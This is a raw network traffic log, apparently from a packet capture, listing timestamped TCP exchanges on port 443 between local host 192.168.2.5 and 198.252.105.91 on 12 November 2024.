Nov 12, 2024 15:28:11.567352057 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.567358971 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.567390919 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.567408085 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.567639112 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.567656040 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.567693949 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.567702055 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.567744017 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.567744017 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.568151951 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.568173885 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.568208933 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.568216085 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.568243980 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.568265915 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.568713903 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.568742990 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.568795919 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.568804026 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.568855047 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.569119930 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.569139957 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.569185972 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.569192886 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.569212914 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.569231987 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.576081991 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.576100111 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.576184988 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.576205969 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.576248884 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.576603889 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.576621056 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.576668024 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.576674938 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.576709986 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.577016115 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.577034950 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.577083111 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.577092886 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.577127934 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.577739954 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.577761889 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.577797890 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.577811003 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.577840090 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.577858925 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.578341007 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.578356981 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.578428984 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.578438997 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.578474045 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.578799963 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.578816891 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.578865051 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.578872919 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.578907967 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.677298069 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.677330017 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.677458048 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.677486897 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.677531004 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.678451061 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.678479910 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.678536892 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.678551912 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.678594112 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.678740025 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.678757906 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.678821087 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.678831100 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.678863049 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.679339886 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.679357052 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.679415941 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.679426908 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.679467916 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.679749012 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.679765940 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.679812908 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.679825068 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.679872036 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.680232048 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.680248022 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.680315018 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.680320024 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.680361986 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.680471897 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.680488110 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.680532932 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.680537939 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.680572033 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.680768967 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.680787086 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.680835962 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.680847883 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.680888891 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.681248903 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.681267023 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.681308985 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.681318998 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.681338072 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.681356907 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.681529045 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.681545973 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.681591034 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.681596994 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.681631088 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.682034969 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.682050943 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.682112932 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.682121992 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.682163954 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.682363987 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.682380915 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.682441950 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.682446957 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.682481050 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.682642937 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.682657957 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.682702065 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.682707071 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.682739973 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.683662891 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.683681011 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.683738947 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.683748960 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.683759928 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.683779001 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.683799028 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.683806896 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.683829069 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.683845043 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.684139013 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.684154034 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.684202909 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.684209108 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.684242010 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.684715986 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.684736967 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.684787035 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.684793949 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.684830904 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.685004950 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.685023069 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.685060024 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.685065985 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.685116053 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.685249090 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.691674948 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.691694975 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.691759109 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.691781998 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.691819906 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.692307949 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.692325115 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.692365885 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.692378044 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.692400932 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.692425966 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.693058014 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.693073034 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.693129063 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.693140030 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.693169117 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.693273067 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.693286896 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.693326950 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.693332911 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.693370104 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.694219112 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.694235086 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.694289923 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.694302082 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.694341898 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.694515944 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.694530964 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.694582939 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.694587946 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.694622993 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.739032030 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.739063978 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.739156961 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.739195108 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.739236116 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.010793924 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.010823965 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.010941029 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.010979891 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.011022091 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.011039019 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.011055946 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.011111975 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.011117935 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.011147976 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.011159897 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.011162043 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.011172056 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.011193991 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.011210918 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.011219978 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.011243105 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.011266947 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.011290073 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.011305094 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.011357069 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.011363029 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.011404991 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.011487961 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.011502028 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.011550903 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.011557102 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.011595964 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.011723995 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.011739969 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.011771917 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.011776924 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.011802912 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.011826038 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.011979103 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.011993885 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.012031078 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.012036085 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.012058020 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.012079954 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.012099028 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.012118101 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.012152910 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.012157917 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.012181997 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.012203932 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.012276888 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.012296915 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.012329102 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.012334108 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.012361050 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.012387991 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.012574911 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.012590885 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.012643099 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.012648106 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.012686968 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.012767076 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.012784004 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.012815952 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.012820005 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.012846947 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.012862921 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.012887001 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.012907982 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.012944937 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.012949944 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.012974977 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.012989998 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.013004065 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.013027906 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.013066053 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.013072014 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.013112068 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.013360977 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.013382912 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.013421059 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.013426065 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.013453007 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.013468981 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.013528109 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.013547897 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.013576031 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.013580084 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.013622046 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.013725996 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.013751030 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.013772011 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.013776064 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.013788939 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.013825893 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.013994932 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.014010906 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.014049053 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.014055014 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.014065981 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.014103889 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.014269114 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.014290094 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.014343977 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.014348984 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.014384985 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.014393091 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.014410019 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.014452934 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.014456987 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.014497042 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.014519930 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.014537096 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.014579058 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.014585018 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.014625072 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.014817953 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.014838934 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.014868021 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.014872074 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.014900923 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.014920950 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.014993906 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.015012980 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.015062094 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.015065908 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.015116930 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.015141010 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.015163898 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.015202045 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.015206099 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.015229940 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.015245914 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.015268087 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.015285969 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.015333891 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.015338898 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.015357971 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.015376091 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.015705109 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.015726089 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.015779972 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.015784979 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.015795946 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.015831947 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.016076088 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.016093016 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.016149998 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.016155958 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.016189098 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.016480923 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.016508102 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.016555071 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.016560078 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.016604900 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:12.016622066 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.016642094 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:12.016697884 CET	49705	443	192.168.2.5	198.252.105.91
